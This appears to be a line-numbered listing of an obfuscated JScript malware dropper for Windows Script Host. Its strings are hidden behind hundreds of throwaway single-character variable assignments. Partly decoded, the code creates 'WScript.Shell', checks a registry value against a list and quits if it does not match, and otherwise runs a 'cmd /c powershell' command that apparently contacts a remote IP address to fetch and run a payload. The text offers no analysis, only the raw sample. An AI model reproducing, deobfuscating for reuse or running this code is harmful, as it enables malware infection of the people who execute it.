2 | var dcsbspm = this[tmuhd + fveok + hyordii + tqqojyh + brpiwcxb + voqlcbg + otndqvis + japevka] ( this[wnqpgnpkm + gzklyfbt + yztlfs + hyordii + oqfrecwkj + tmuhd + japevka][ftrzooc + hyordii + brpiwcxb + fveok + japevka + brpiwcxb + gpogejrj + wcljg + umfoebpjq + brpiwcxb + yztlfs + japevka] ( wnqpgnpkm + gzklyfbt + yztlfs + hyordii + oqfrecwkj + tmuhd + japevka + jlknr + gzklyfbt + vljhsf + brpiwcxb + zgnla + zgnla ) [jniwxrj + brpiwcxb + bmrczpna + jniwxrj + brpiwcxb + fveok + azbou] ( qlbhf + xpndkxa + ybaok + tgzcg + ebghmi + ftrzooc + okhltyvo + jniwxrj + jniwxrj + ybaok + zlqtui + ymmkty + ebghmi + okhltyvo + gzklyfbt + ybaok + jniwxrj + wlhgu + ftrzooc + vtwuc + otndqvis + japevka + hyordii + vtwuc + zgnla + dzbmi + eeovldkct + fveok + otndqvis + brpiwcxb + zgnla + wlhgu + voqlcbg + otndqvis + japevka + brpiwcxb + hyordii + otndqvis + fveok + japevka + oqfrecwkj + vtwuc + otndqvis + fveok + zgnla + wlhgu + mlxbd + vtwuc + yztlfs + fveok + zgnla + brpiwcxb ), 16 ); |
|
3 | for ( jpumkslj = 0 ; jpumkslj < zvjklj[zgnla + brpiwcxb + otndqvis + bmrczpna + japevka + vljhsf] ; ++ jpumkslj ) | |
4 | { | |
5 | if ( dcsbspm == zvjklj[jpumkslj] ) | |
6 | { | |
7 | dcsbspm = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( dcsbspm !== true ) | |
12 | this[wnqpgnpkm + gzklyfbt + yztlfs + hyordii + oqfrecwkj + tmuhd + japevka][vbflahvdc + vegkavj + oqfrecwkj + japevka] ( ); | |
13 | this[wnqpgnpkm + gzklyfbt + yztlfs + hyordii + oqfrecwkj + tmuhd + japevka][ftrzooc + hyordii + brpiwcxb + fveok + japevka + brpiwcxb + gpogejrj + wcljg + umfoebpjq + brpiwcxb + yztlfs + japevka] ( wnqpgnpkm + gzklyfbt + yztlfs + hyordii + oqfrecwkj + tmuhd + japevka + jlknr + gzklyfbt + vljhsf + brpiwcxb + zgnla + zgnla ) [hyordii + vegkavj + otndqvis] ( yztlfs + pwivv + azbou + dzbmi + nyzve + yztlfs + dzbmi + tmuhd + vtwuc + iixldzd + brpiwcxb + hyordii + tqqojyh + vljhsf + brpiwcxb + zgnla + zgnla + jlknr + brpiwcxb + jhxjooeid + brpiwcxb + dzbmi + cqpibmr + ftrzooc + vtwuc + pwivv + pwivv + fveok + otndqvis + azbou + dzbmi + vaszxty + voqlcbg + otndqvis + flgcttr + vtwuc + kchbvi + brpiwcxb + cqpibmr + wnqpgnpkm + brpiwcxb + wcljg + jniwxrj + brpiwcxb + zmrawx + vegkavj + brpiwcxb + tqqojyh + japevka + dzbmi + cqpibmr + gpogejrj + vegkavj + japevka + nhgvxmzh + oqfrecwkj + zgnla + brpiwcxb + dzbmi + izphvncsu + japevka + brpiwcxb + pwivv + tmuhd + izphvncsu + wlhgu + oqfrecwkj + otndqvis + flgcttr + vtwuc + oqfrecwkj + yztlfs + brpiwcxb + jlknr + tmuhd + azbou + nfesufn + dzbmi + vljhsf + japevka + japevka + tmuhd + sdhagcg + nyzve + nyzve + wbtsrj + tthmnr + fnaqpiq + jlknr + wbtsrj + abqng + fnaqpiq + jlknr + wbtsrj + jlknr + wyyldst + wpynbv + qhizqjut + nyzve + oqfrecwkj + otndqvis + flgcttr + vtwuc + oqfrecwkj + yztlfs + brpiwcxb + jlknr + tmuhd + vljhsf + tmuhd + vaszxty + yjmkiost + yjmkiost + tqqojyh + japevka + fveok + hyordii + japevka + dzbmi + izphvncsu + japevka + brpiwcxb + pwivv + tmuhd + izphvncsu + wlhgu + oqfrecwkj + otndqvis + flgcttr + vtwuc + oqfrecwkj + yztlfs + brpiwcxb + jlknr + tmuhd + azbou + nfesufn + yjmkiost + yjmkiost + yztlfs + pwivv + azbou + dzbmi + nyzve + yztlfs + dzbmi + otndqvis + brpiwcxb + japevka + dzbmi + vegkavj + tqqojyh + brpiwcxb + dzbmi + wlhgu + wlhgu + wbtsrj + tthmnr + fnaqpiq + jlknr + wbtsrj + abqng + fnaqpiq + jlknr + wbtsrj + jlknr + wyyldst + wpynbv + qhizqjut + nfjaaf + yuvyuvt + yuvyuvt + yuvyuvt + yuvyuvt + wlhgu + azbou + fveok + flgcttr + iixldzd + iixldzd + iixldzd + hyordii + vtwuc + vtwuc + japevka + wlhgu + yjmkiost + yjmkiost + yztlfs + pwivv + azbou + dzbmi + nyzve + yztlfs + dzbmi + hyordii + brpiwcxb + bmrczpna + tqqojyh + flgcttr + hyordii + fnaqpiq + wyyldst + dzbmi + nyzve + tqqojyh + dzbmi + wlhgu + wlhgu + wbtsrj + tthmnr + fnaqpiq + jlknr + wbtsrj + abqng + fnaqpiq + jlknr + wbtsrj + jlknr + wyyldst + wpynbv + qhizqjut + nfjaaf + yuvyuvt + yuvyuvt + yuvyuvt + yuvyuvt + wlhgu + azbou + fveok + flgcttr + iixldzd + iixldzd + iixldzd + hyordii + vtwuc + vtwuc + japevka + wlhgu + wyyldst + ryyfokx + yuvyuvt + abqng + wbtsrj + wbtsrj + tthmnr + ryyfokx + qhizqjut + wbtsrj + fnaqpiq + wyyldst + wbtsrj + yuvyuvt + wbtsrj + jlknr + azbou + zgnla + zgnla, 0, false ); |
|
14 | } | |
15 | vegkavj = "E"; | |
16 | vegkavj = "B"; | |
17 | vegkavj = "S"; | |
18 | vegkavj = "l"; | |
19 | vegkavj = "i"; | |
20 | vegkavj = "J"; | |
21 | vegkavj = "k"; | |
22 | vegkavj = "J"; | |
23 | vegkavj = "c"; | |
24 | vegkavj = "k"; | |
25 | vegkavj = "C"; | |
26 | vegkavj = "y"; | |
27 | vegkavj = "q"; | |
28 | vegkavj = "f"; | |
29 | vegkavj = "Z"; | |
30 | vegkavj = "V"; | |
31 | vegkavj = "s"; | |
32 | vegkavj = "H"; | |
33 | vegkavj = "Q"; | |
34 | vegkavj = "z"; | |
35 | vegkavj = "A"; | |
36 | vegkavj = "L"; | |
37 | vegkavj = "s"; | |
38 | vegkavj = "d"; | |
39 | vegkavj = "U"; | |
40 | vegkavj = "h"; | |
41 | vegkavj = "w"; | |
42 | vegkavj = "a"; | |
43 | vegkavj = "x"; | |
44 | vegkavj = "M"; | |
45 | vegkavj = "A"; | |
46 | vegkavj = "M"; | |
47 | vegkavj = "E"; | |
48 | vegkavj = "m"; | |
49 | vegkavj = "h"; | |
50 | vegkavj = "Y"; | |
51 | vegkavj = "Z"; | |
52 | vegkavj = "g"; | |
53 | vegkavj = "u"; | |
54 | ryyfokx = "M"; | |
55 | ryyfokx = "q"; | |
56 | ryyfokx = "B"; | |
57 | ryyfokx = "p"; | |
58 | ryyfokx = "l"; | |
59 | ryyfokx = "a"; | |
60 | ryyfokx = "z"; | |
61 | ryyfokx = "P"; | |
62 | ryyfokx = "g"; | |
63 | ryyfokx = "7"; | |
64 | tqqojyh = "Y"; | |
65 | tqqojyh = "a"; | |
66 | tqqojyh = "X"; | |
67 | tqqojyh = "I"; | |
68 | tqqojyh = "e"; | |
69 | tqqojyh = "B"; | |
70 | tqqojyh = "O"; | |
71 | tqqojyh = "P"; | |
72 | tqqojyh = "V"; | |
73 | tqqojyh = "p"; | |
74 | tqqojyh = "E"; | |
75 | tqqojyh = "T"; | |
76 | tqqojyh = "s"; | |
77 | tqqojyh = "e"; | |
78 | tqqojyh = "j"; | |
79 | tqqojyh = "l"; | |
80 | tqqojyh = "p"; | |
81 | tqqojyh = "O"; | |
82 | tqqojyh = "B"; | |
83 | tqqojyh = "v"; | |
84 | tqqojyh = "w"; | |
85 | tqqojyh = "M"; | |
86 | tqqojyh = "B"; | |
87 | tqqojyh = "A"; | |
88 | tqqojyh = "R"; | |
89 | tqqojyh = "g"; | |
90 | tqqojyh = "D"; | |
91 | tqqojyh = "y"; | |
92 | tqqojyh = "C"; | |
93 | tqqojyh = "r"; | |
94 | tqqojyh = "l"; | |
95 | tqqojyh = "D"; | |
96 | tqqojyh = "y"; | |
97 | tqqojyh = "S"; | |
98 | tqqojyh = "g"; | |
99 | tqqojyh = "V"; | |
100 | tqqojyh = "s"; | |
101 | fveok = "g"; | |
102 | fveok = "R"; | |
103 | fveok = "a"; | |
104 | wpynbv = "R"; | |
105 | wpynbv = "S"; | |
106 | wpynbv = "S"; | |
107 | wpynbv = "z"; | |
108 | wpynbv = "C"; | |
109 | wpynbv = "d"; | |
110 | wpynbv = "j"; | |
111 | wpynbv = "0"; | |
112 | vaszxty = "T"; | |
113 | vaszxty = "U"; | |
114 | vaszxty = "V"; | |
115 | vaszxty = "k"; | |
116 | vaszxty = "P"; | |
117 | vaszxty = "W"; | |
118 | vaszxty = "I"; | |
119 | vaszxty = "C"; | |
120 | vaszxty = "W"; | |
121 | vaszxty = "M"; | |
122 | vaszxty = "i"; | |
123 | vaszxty = "B"; | |
124 | vaszxty = "\""; | |
125 | jlknr = "k"; | |
126 | jlknr = "M"; | |
127 | jlknr = "h"; | |
128 | jlknr = "O"; | |
129 | jlknr = "L"; | |
130 | jlknr = "k"; | |
131 | jlknr = "D"; | |
132 | jlknr = "w"; | |
133 | jlknr = "I"; | |
134 | jlknr = "X"; | |
135 | jlknr = "L"; | |
136 | jlknr = "q"; | |
137 | jlknr = "W"; | |
138 | jlknr = "u"; | |
139 | jlknr = "e"; | |
140 | jlknr = "L"; | |
141 | jlknr = "V"; | |
142 | jlknr = "h"; | |
143 | jlknr = "h"; | |
144 | jlknr = "."; | |
145 | vljhsf = "o"; | |
146 | vljhsf = "n"; | |
147 | vljhsf = "C"; | |
148 | vljhsf = "J"; | |
149 | vljhsf = "W"; | |
150 | vljhsf = "k"; | |
151 | vljhsf = "m"; | |
152 | vljhsf = "i"; | |
153 | vljhsf = "U"; | |
154 | vljhsf = "D"; | |
155 | vljhsf = "K"; | |
156 | vljhsf = "Q"; | |
157 | vljhsf = "y"; | |
158 | vljhsf = "k"; | |
159 | vljhsf = "w"; | |
160 | vljhsf = "P"; | |
161 | vljhsf = "H"; | |
162 | vljhsf = "E"; | |
163 | vljhsf = "E"; | |
164 | vljhsf = "H"; | |
165 | vljhsf = "y"; | |
166 | vljhsf = "h"; | |
167 | ebghmi = "U"; | |
168 | ebghmi = "e"; | |
169 | ebghmi = "x"; | |
170 | ebghmi = "_"; | |
171 | ybaok = "w"; | |
172 | ybaok = "G"; | |
173 | ybaok = "I"; | |
174 | ybaok = "O"; | |
175 | ybaok = "f"; | |
176 | ybaok = "F"; | |
177 | ybaok = "s"; | |
178 | ybaok = "A"; | |
179 | ybaok = "G"; | |
180 | ybaok = "S"; | |
181 | ybaok = "A"; | |
182 | ybaok = "Y"; | |
183 | ybaok = "x"; | |
184 | ybaok = "N"; | |
185 | ybaok = "E"; | |
186 | ybaok = "c"; | |
187 | ybaok = "a"; | |
188 | ybaok = "X"; | |
189 | ybaok = "t"; | |
190 | ybaok = "m"; | |
191 | ybaok = "t"; | |
192 | ybaok = "f"; | |
193 | ybaok = "U"; | |
194 | ybaok = "G"; | |
195 | ybaok = "h"; | |
196 | ybaok = "s"; | |
197 | ybaok = "H"; | |
198 | ybaok = "G"; | |
199 | ybaok = "u"; | |
200 | ybaok = "j"; | |
201 | ybaok = "B"; | |
202 | ybaok = "E"; | |
203 | flgcttr = "k"; | |
204 | flgcttr = "B"; | |
205 | flgcttr = "l"; | |
206 | flgcttr = "n"; | |
207 | flgcttr = "N"; | |
208 | flgcttr = "N"; | |
209 | flgcttr = "q"; | |
210 | flgcttr = "s"; | |
211 | flgcttr = "A"; | |
212 | flgcttr = "y"; | |
213 | flgcttr = "o"; | |
214 | flgcttr = "Q"; | |
215 | flgcttr = "Y"; | |
216 | flgcttr = "i"; | |
217 | flgcttr = "m"; | |
218 | flgcttr = "O"; | |
219 | flgcttr = "m"; | |
220 | flgcttr = "e"; | |
221 | flgcttr = "e"; | |
222 | flgcttr = "v"; | |
223 | flgcttr = "p"; | |
224 | flgcttr = "E"; | |
225 | flgcttr = "n"; | |
226 | flgcttr = "S"; | |
227 | flgcttr = "B"; | |
228 | flgcttr = "o"; | |
229 | flgcttr = "K"; | |
230 | flgcttr = "X"; | |
231 | flgcttr = "v"; | |
232 | gzklyfbt = "E"; | |
233 | gzklyfbt = "F"; | |
234 | gzklyfbt = "I"; | |
235 | gzklyfbt = "a"; | |
236 | gzklyfbt = "P"; | |
237 | gzklyfbt = "i"; | |
238 | gzklyfbt = "e"; | |
239 | gzklyfbt = "e"; | |
240 | gzklyfbt = "g"; | |
241 | gzklyfbt = "E"; | |
242 | gzklyfbt = "W"; | |
243 | gzklyfbt = "F"; | |
244 | gzklyfbt = "M"; | |
245 | gzklyfbt = "i"; | |
246 | gzklyfbt = "S"; | |
247 | gzklyfbt = "q"; | |
248 | gzklyfbt = "s"; | |
249 | gzklyfbt = "C"; | |
250 | gzklyfbt = "W"; | |
251 | gzklyfbt = "S"; | |
252 | gzklyfbt = "z"; | |
253 | gzklyfbt = "z"; | |
254 | gzklyfbt = "R"; | |
255 | gzklyfbt = "d"; | |
256 | gzklyfbt = "J"; | |
257 | gzklyfbt = "Q"; | |
258 | gzklyfbt = "L"; | |
259 | gzklyfbt = "D"; | |
260 | gzklyfbt = "o"; | |
261 | gzklyfbt = "x"; | |
262 | gzklyfbt = "C"; | |
263 | gzklyfbt = "f"; | |
264 | gzklyfbt = "O"; | |
265 | gzklyfbt = "f"; | |
266 | gzklyfbt = "m"; | |
267 | gzklyfbt = "N"; | |
268 | gzklyfbt = "B"; | |
269 | gzklyfbt = "v"; | |
270 | gzklyfbt = "b"; | |
271 | gzklyfbt = "O"; | |
272 | gzklyfbt = "j"; | |
273 | gzklyfbt = "S"; | |
274 | zlqtui = "Y"; | |
275 | zlqtui = "b"; | |
276 | zlqtui = "n"; | |
277 | zlqtui = "X"; | |
278 | zlqtui = "C"; | |
279 | zlqtui = "d"; | |
280 | zlqtui = "j"; | |
281 | zlqtui = "u"; | |
282 | zlqtui = "L"; | |
283 | zlqtui = "T"; | |
284 | zlqtui = "e"; | |
285 | zlqtui = "Y"; | |
286 | zlqtui = "J"; | |
287 | zlqtui = "m"; | |
288 | zlqtui = "b"; | |
289 | zlqtui = "M"; | |
290 | zlqtui = "O"; | |
291 | zlqtui = "H"; | |
292 | zlqtui = "M"; | |
293 | zlqtui = "L"; | |
294 | zlqtui = "k"; | |
295 | zlqtui = "c"; | |
296 | zlqtui = "a"; | |
297 | zlqtui = "K"; | |
298 | zlqtui = "f"; | |
299 | zlqtui = "j"; | |
300 | zlqtui = "f"; | |
301 | zlqtui = "X"; | |
302 | zlqtui = "g"; | |
303 | zlqtui = "S"; | |
304 | zlqtui = "d"; | |
305 | zlqtui = "D"; | |
306 | zlqtui = "v"; | |
307 | zlqtui = "N"; | |
308 | abqng = "V"; | |
309 | abqng = "S"; | |
310 | abqng = "U"; | |
311 | abqng = "y"; | |
312 | abqng = "y"; | |
313 | abqng = "W"; | |
314 | abqng = "f"; | |
315 | abqng = "j"; | |
316 | abqng = "b"; | |
317 | abqng = "F"; | |
318 | abqng = "K"; | |
319 | abqng = "b"; | |
320 | abqng = "i"; | |
321 | abqng = "a"; | |
322 | abqng = "q"; | |
323 | abqng = "X"; | |
324 | abqng = "p"; | |
325 | abqng = "r"; | |
326 | abqng = "T"; | |
327 | abqng = "D"; | |
328 | abqng = "4"; | |
329 | otndqvis = "n"; | |
330 | otndqvis = "F"; | |
331 | otndqvis = "A"; | |
332 | otndqvis = "g"; | |
333 | otndqvis = "r"; | |
334 | otndqvis = "i"; | |
335 | otndqvis = "F"; | |
336 | otndqvis = "h"; | |
337 | otndqvis = "q"; | |
338 | otndqvis = "D"; | |
339 | otndqvis = "u"; | |
340 | otndqvis = "t"; | |
341 | otndqvis = "l"; | |
342 | otndqvis = "J"; | |
343 | otndqvis = "w"; | |
344 | otndqvis = "U"; | |
345 | otndqvis = "N"; | |
346 | otndqvis = "c"; | |
347 | otndqvis = "B"; | |
348 | otndqvis = "Y"; | |
349 | otndqvis = "h"; | |
350 | otndqvis = "A"; | |
351 | otndqvis = "X"; | |
352 | otndqvis = "F"; | |
353 | otndqvis = "y"; | |
354 | otndqvis = "P"; | |
355 | otndqvis = "s"; | |
356 | otndqvis = "N"; | |
357 | otndqvis = "m"; | |
358 | otndqvis = "R"; | |
359 | otndqvis = "t"; | |
360 | otndqvis = "m"; | |
361 | otndqvis = "k"; | |
362 | otndqvis = "C"; | |
363 | otndqvis = "y"; | |
364 | otndqvis = "F"; | |
365 | otndqvis = "G"; | |
366 | otndqvis = "m"; | |
367 | otndqvis = "n"; | |
368 | cqpibmr = "l"; | |
369 | cqpibmr = "C"; | |
370 | cqpibmr = "A"; | |
371 | cqpibmr = "E"; | |
372 | cqpibmr = "q"; | |
373 | cqpibmr = "i"; | |
374 | cqpibmr = "h"; | |
375 | cqpibmr = "O"; | |
376 | cqpibmr = "T"; | |
377 | cqpibmr = "f"; | |
378 | cqpibmr = "L"; | |
379 | cqpibmr = "K"; | |
380 | cqpibmr = "A"; | |
381 | cqpibmr = "O"; | |
382 | cqpibmr = "q"; | |
383 | cqpibmr = "k"; | |
384 | cqpibmr = "Q"; | |
385 | cqpibmr = "o"; | |
386 | cqpibmr = "S"; | |
387 | cqpibmr = "s"; | |
388 | cqpibmr = "a"; | |
389 | cqpibmr = "k"; | |
390 | cqpibmr = "m"; | |
391 | cqpibmr = "g"; | |
392 | cqpibmr = "p"; | |
393 | cqpibmr = "A"; | |
394 | cqpibmr = "c"; | |
395 | cqpibmr = "K"; | |
396 | cqpibmr = "K"; | |
397 | cqpibmr = "V"; | |
398 | cqpibmr = "y"; | |
399 | cqpibmr = "F"; | |
400 | cqpibmr = "P"; | |
401 | cqpibmr = "n"; | |
402 | cqpibmr = "L"; | |
403 | cqpibmr = "S"; | |
404 | cqpibmr = "U"; | |
405 | cqpibmr = "l"; | |
406 | cqpibmr = "N"; | |
407 | cqpibmr = "J"; | |
408 | cqpibmr = "-"; | |
409 | vtwuc = "B"; | |
410 | vtwuc = "o"; | |
411 | vtwuc = "O"; | |
412 | vtwuc = "c"; | |
413 | vtwuc = "k"; | |
414 | vtwuc = "c"; | |
415 | vtwuc = "W"; | |
416 | vtwuc = "m"; | |
417 | vtwuc = "n"; | |
418 | vtwuc = "o"; | |
419 | voqlcbg = "l"; | |
420 | voqlcbg = "v"; | |
421 | voqlcbg = "M"; | |
422 | voqlcbg = "y"; | |
423 | voqlcbg = "A"; | |
424 | voqlcbg = "e"; | |
425 | voqlcbg = "u"; | |
426 | voqlcbg = "I"; | |
427 | voqlcbg = "J"; | |
428 | voqlcbg = "o"; | |
429 | voqlcbg = "B"; | |
430 | voqlcbg = "n"; | |
431 | voqlcbg = "k"; | |
432 | voqlcbg = "x"; | |
433 | voqlcbg = "I"; | |
434 | wbtsrj = "q"; | |
435 | wbtsrj = "E"; | |
436 | wbtsrj = "a"; | |
437 | wbtsrj = "F"; | |
438 | wbtsrj = "L"; | |
439 | wbtsrj = "Z"; | |
440 | wbtsrj = "K"; | |
441 | wbtsrj = "1"; | |
442 | hyordii = "M"; | |
443 | hyordii = "H"; | |
444 | hyordii = "w"; | |
445 | hyordii = "S"; | |
446 | hyordii = "T"; | |
447 | hyordii = "B"; | |
448 | hyordii = "W"; | |
449 | hyordii = "C"; | |
450 | hyordii = "x"; | |
451 | hyordii = "r"; | |
452 | oqfrecwkj = "z"; | |
453 | oqfrecwkj = "h"; | |
454 | oqfrecwkj = "P"; | |
455 | oqfrecwkj = "y"; | |
456 | oqfrecwkj = "D"; | |
457 | oqfrecwkj = "b"; | |
458 | oqfrecwkj = "j"; | |
459 | oqfrecwkj = "s"; | |
460 | oqfrecwkj = "I"; | |
461 | oqfrecwkj = "G"; | |
462 | oqfrecwkj = "t"; | |
463 | oqfrecwkj = "f"; | |
464 | oqfrecwkj = "j"; | |
465 | oqfrecwkj = "t"; | |
466 | oqfrecwkj = "r"; | |
467 | oqfrecwkj = "i"; | |
468 | jhxjooeid = "Q"; | |
469 | jhxjooeid = "c"; | |
470 | jhxjooeid = "e"; | |
471 | jhxjooeid = "W"; | |
472 | jhxjooeid = "B"; | |
473 | jhxjooeid = "J"; | |
474 | jhxjooeid = "Z"; | |
475 | jhxjooeid = "e"; | |
476 | jhxjooeid = "I"; | |
477 | jhxjooeid = "K"; | |
478 | jhxjooeid = "W"; | |
479 | jhxjooeid = "n"; | |
480 | jhxjooeid = "Z"; | |
481 | jhxjooeid = "L"; | |
482 | jhxjooeid = "X"; | |
483 | jhxjooeid = "y"; | |
484 | jhxjooeid = "c"; | |
485 | jhxjooeid = "y"; | |
486 | jhxjooeid = "h"; | |
487 | jhxjooeid = "a"; | |
488 | jhxjooeid = "C"; | |
489 | jhxjooeid = "C"; | |
490 | jhxjooeid = "d"; | |
491 | jhxjooeid = "w"; | |
492 | jhxjooeid = "a"; | |
493 | jhxjooeid = "A"; | |
494 | jhxjooeid = "g"; | |
495 | jhxjooeid = "E"; | |
496 | jhxjooeid = "n"; | |
497 | jhxjooeid = "Y"; | |
498 | jhxjooeid = "n"; | |
499 | jhxjooeid = "l"; | |
500 | jhxjooeid = "o"; | |
501 | jhxjooeid = "c"; | |
502 | jhxjooeid = "y"; | |
503 | jhxjooeid = "S"; | |
504 | jhxjooeid = "c"; | |
505 | jhxjooeid = "W"; | |
506 | jhxjooeid = "n"; | |
507 | jhxjooeid = "P"; | |
508 | jhxjooeid = "x"; | |
509 | zgnla = "h"; | |
510 | zgnla = "C"; | |
511 | zgnla = "E"; | |
512 | zgnla = "p"; | |
513 | zgnla = "g"; | |
514 | zgnla = "y"; | |
515 | zgnla = "P"; | |
516 | zgnla = "Q"; | |
517 | zgnla = "z"; | |
518 | zgnla = "j"; | |
519 | zgnla = "F"; | |
520 | zgnla = "N"; | |
521 | zgnla = "l"; | |
522 | wlhgu = "p"; | |
523 | wlhgu = "v"; | |
524 | wlhgu = "o"; | |
525 | wlhgu = "c"; | |
526 | wlhgu = "t"; | |
527 | wlhgu = "X"; | |
528 | wlhgu = "D"; | |
529 | wlhgu = "Y"; | |
530 | wlhgu = "t"; | |
531 | wlhgu = "s"; | |
532 | wlhgu = "p"; | |
533 | wlhgu = "j"; | |
534 | wlhgu = "V"; | |
535 | wlhgu = "\\"; | |
536 | gpogejrj = "J"; | |
537 | gpogejrj = "z"; | |
538 | gpogejrj = "G"; | |
539 | gpogejrj = "q"; | |
540 | gpogejrj = "v"; | |
541 | gpogejrj = "y"; | |
542 | gpogejrj = "A"; | |
543 | gpogejrj = "i"; | |
544 | gpogejrj = "G"; | |
545 | gpogejrj = "U"; | |
546 | gpogejrj = "n"; | |
547 | gpogejrj = "M"; | |
548 | gpogejrj = "B"; | |
549 | gpogejrj = "r"; | |
550 | gpogejrj = "Y"; | |
551 | gpogejrj = "u"; | |
552 | gpogejrj = "z"; | |
553 | gpogejrj = "e"; | |
554 | gpogejrj = "f"; | |
555 | gpogejrj = "C"; | |
556 | gpogejrj = "v"; | |
557 | gpogejrj = "X"; | |
558 | gpogejrj = "g"; | |
559 | gpogejrj = "j"; | |
560 | gpogejrj = "Z"; | |
561 | gpogejrj = "u"; | |
562 | gpogejrj = "O"; | |
563 | wyyldst = "L"; | |
564 | wyyldst = "w"; | |
565 | wyyldst = "y"; | |
566 | wyyldst = "r"; | |
567 | wyyldst = "E"; | |
568 | wyyldst = "b"; | |
569 | wyyldst = "o"; | |
570 | wyyldst = "b"; | |
571 | wyyldst = "C"; | |
572 | wyyldst = "l"; | |
573 | wyyldst = "e"; | |
574 | wyyldst = "E"; | |
575 | wyyldst = "r"; | |
576 | wyyldst = "H"; | |
577 | wyyldst = "c"; | |
578 | wyyldst = "d"; | |
579 | wyyldst = "Z"; | |
580 | wyyldst = "D"; | |
581 | wyyldst = "x"; | |
582 | wyyldst = "g"; | |
583 | wyyldst = "k"; | |
584 | wyyldst = "C"; | |
585 | wyyldst = "r"; | |
586 | wyyldst = "r"; | |
587 | wyyldst = "r"; | |
588 | wyyldst = "y"; | |
589 | wyyldst = "P"; | |
590 | wyyldst = "P"; | |
591 | wyyldst = "t"; | |
592 | wyyldst = "Y"; | |
593 | wyyldst = "L"; | |
594 | wyyldst = "K"; | |
595 | wyyldst = "E"; | |
596 | wyyldst = "J"; | |
597 | wyyldst = "Q"; | |
598 | wyyldst = "s"; | |
599 | wyyldst = "s"; | |
600 | wyyldst = "c"; | |
601 | wyyldst = "S"; | |
602 | wyyldst = "2"; | |
603 | tthmnr = "r"; | |
604 | tthmnr = "w"; | |
605 | tthmnr = "L"; | |
606 | tthmnr = "b"; | |
607 | tthmnr = "b"; | |
608 | tthmnr = "j"; | |
609 | tthmnr = "9"; | |
610 | wnqpgnpkm = "a"; | |
611 | wnqpgnpkm = "Y"; | |
612 | wnqpgnpkm = "u"; | |
613 | wnqpgnpkm = "d"; | |
614 | wnqpgnpkm = "v"; | |
615 | wnqpgnpkm = "j"; | |
616 | wnqpgnpkm = "c"; | |
617 | wnqpgnpkm = "K"; | |
618 | wnqpgnpkm = "F"; | |
619 | wnqpgnpkm = "d"; | |
620 | wnqpgnpkm = "S"; | |
621 | wnqpgnpkm = "o"; | |
622 | wnqpgnpkm = "k"; | |
623 | wnqpgnpkm = "Z"; | |
624 | wnqpgnpkm = "C"; | |
625 | wnqpgnpkm = "k"; | |
626 | wnqpgnpkm = "o"; | |
627 | wnqpgnpkm = "a"; | |
628 | wnqpgnpkm = "E"; | |
629 | wnqpgnpkm = "B"; | |
630 | wnqpgnpkm = "n"; | |
631 | wnqpgnpkm = "p"; | |
632 | wnqpgnpkm = "o"; | |
633 | wnqpgnpkm = "p"; | |
634 | wnqpgnpkm = "W"; | |
635 | wnqpgnpkm = "Y"; | |
636 | wnqpgnpkm = "I"; | |
637 | wnqpgnpkm = "D"; | |
638 | wnqpgnpkm = "U"; | |
639 | wnqpgnpkm = "E"; | |
640 | wnqpgnpkm = "a"; | |
641 | wnqpgnpkm = "E"; | |
642 | wnqpgnpkm = "s"; | |
643 | wnqpgnpkm = "G"; | |
644 | wnqpgnpkm = "B"; | |
645 | wnqpgnpkm = "A"; | |
646 | wnqpgnpkm = "W"; | |
647 | pwivv = "S"; | |
648 | pwivv = "J"; | |
649 | pwivv = "s"; | |
650 | pwivv = "t"; | |
651 | pwivv = "b"; | |
652 | pwivv = "C"; | |
653 | pwivv = "h"; | |
654 | pwivv = "H"; | |
655 | pwivv = "o"; | |
656 | pwivv = "w"; | |
657 | pwivv = "j"; | |
658 | pwivv = "P"; | |
659 | pwivv = "b"; | |
660 | pwivv = "N"; | |
661 | pwivv = "J"; | |
662 | pwivv = "t"; | |
663 | pwivv = "H"; | |
664 | pwivv = "T"; | |
665 | pwivv = "w"; | |
666 | pwivv = "k"; | |
667 | pwivv = "m"; | |
668 | pwivv = "w"; | |
669 | pwivv = "B"; | |
670 | pwivv = "g"; | |
671 | pwivv = "D"; | |
672 | pwivv = "c"; | |
673 | pwivv = "T"; | |
674 | pwivv = "z"; | |
675 | pwivv = "f"; | |
676 | pwivv = "k"; | |
677 | pwivv = "X"; | |
678 | pwivv = "T"; | |
679 | pwivv = "j"; | |
680 | pwivv = "K"; | |
681 | pwivv = "A"; | |
682 | pwivv = "v"; | |
683 | pwivv = "f"; | |
684 | pwivv = "R"; | |
685 | pwivv = "m"; | |
686 | nfjaaf = "p"; | |
687 | nfjaaf = "A"; | |
688 | nfjaaf = "J"; | |
689 | nfjaaf = "s"; | |
690 | nfjaaf = "J"; | |
691 | nfjaaf = "Q"; | |
692 | nfjaaf = "x"; | |
693 | nfjaaf = "g"; | |
694 | nfjaaf = "X"; | |
695 | nfjaaf = "O"; | |
696 | nfjaaf = "S"; | |
697 | nfjaaf = "p"; | |
698 | nfjaaf = "H"; | |
699 | nfjaaf = "L"; | |
700 | nfjaaf = "H"; | |
701 | nfjaaf = "p"; | |
702 | nfjaaf = "e"; | |
703 | nfjaaf = "F"; | |
704 | nfjaaf = "n"; | |
705 | nfjaaf = "M"; | |
706 | nfjaaf = "C"; | |
707 | nfjaaf = "S"; | |
708 | nfjaaf = "y"; | |
709 | nfjaaf = "t"; | |
710 | nfjaaf = "d"; | |
711 | nfjaaf = "l"; | |
712 | nfjaaf = "@"; | |
713 | nhgvxmzh = "I"; | |
714 | nhgvxmzh = "A"; | |
715 | nhgvxmzh = "t"; | |
716 | nhgvxmzh = "s"; | |
717 | nhgvxmzh = "I"; | |
718 | nhgvxmzh = "e"; | |
719 | nhgvxmzh = "L"; | |
720 | nhgvxmzh = "L"; | |
721 | nhgvxmzh = "E"; | |
722 | nhgvxmzh = "N"; | |
723 | nhgvxmzh = "q"; | |
724 | nhgvxmzh = "J"; | |
725 | nhgvxmzh = "h"; | |
726 | nhgvxmzh = "B"; | |
727 | nhgvxmzh = "Q"; | |
728 | nhgvxmzh = "W"; | |
729 | nhgvxmzh = "p"; | |
730 | nhgvxmzh = "i"; | |
731 | nhgvxmzh = "V"; | |
732 | nhgvxmzh = "k"; | |
733 | nhgvxmzh = "q"; | |
734 | nhgvxmzh = "e"; | |
735 | nhgvxmzh = "O"; | |
736 | nhgvxmzh = "O"; | |
737 | nhgvxmzh = "U"; | |
738 | nhgvxmzh = "E"; | |
739 | nhgvxmzh = "Z"; | |
740 | nhgvxmzh = "P"; | |
741 | nhgvxmzh = "F"; | |
742 | wcljg = "b"; | |
743 | wcljg = "y"; | |
744 | wcljg = "n"; | |
745 | wcljg = "X"; | |
746 | wcljg = "B"; | |
747 | wcljg = "P"; | |
748 | wcljg = "n"; | |
